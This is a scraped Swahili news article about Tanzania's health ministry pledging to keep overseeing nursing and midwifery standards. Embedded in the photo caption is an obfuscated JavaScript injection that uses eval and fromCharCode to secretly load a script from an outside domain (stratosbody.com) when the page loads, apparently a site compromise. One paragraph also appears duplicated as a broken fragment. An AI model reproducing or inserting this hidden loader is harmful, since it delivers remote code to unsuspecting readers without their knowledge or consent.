Recent Comments

Afya kuendelea kusimamia viwango vya wauguzi

By Baraka Bitariho Aug 27, 2015
<p>Katibu Mkuu Wizara ya Afya na Ustawi wa Jamii, Dr. Donan Mmbado</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Katibu Mkuu Wizara ya Afya na Ustawi wa Jamii, Dr. Donan Mmbado
Katibu Mkuu Wizara ya Afya na Ustawi wa Jamii, Dr. Donan Mmbado

KATIBU Mkuu Wizara ya Afya na Ustawi wa Jamii, Dk Donan Mmbando amesema Serikali itaendelea kusimamia viwango vya taaluma ya uuguzi na ukunga kuboresha utoaji wa huduma katika sekta ya afya nchini.

ya na Ustawi wa Jamii, Dk Donan Mmbando amesema Serikali itaendelea kusimamia viwango vya taaluma ya uuguzi na ukunga kuboresha utoaji wa huduma katika sekta ya afya nchini.

Akizungumza jijini Dar es Salaam jana katika mkutano wa wakunga na wauguzi wa Afrika Mashariki alisema, sekta hiyo inahitaji kupata mafunzo endelevu ili kuboresha huduma na kuweka uwiano sawa katika utoaji wa huduma kwa nchi za Afrika Mashariki.

Dk Mmbando alisema sekta ya Afya kwa sasa inakabiliwa na changamoto ya kuongezeka kwa magonjwa yasiyopewa kipaumbele katika za ukanda wa Afrika, hivyo ni vyema huduma zikaboreshwa ili kuokoa maisha ya watu.

Kaimu Mkurugenzi Uuguzi na Ukunga, Ama Kasangara alisema wauguzi na wakunga wanahitaji kuwa kitu kimoja ili kurahisisha huduma za afya katika ulimwengu wa soko huria.

Mshiriki Keziah Kapesa wa Chama cha Wauguzi na Wakunga wa Kujitegemea Tanzania, PRINMAT, alisema panahitajika chombo kimoja cha kumtambulisha muuguzi kuepuka wauguzi wasiokuwa na vigezo kuharibu taaluma hiyo.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com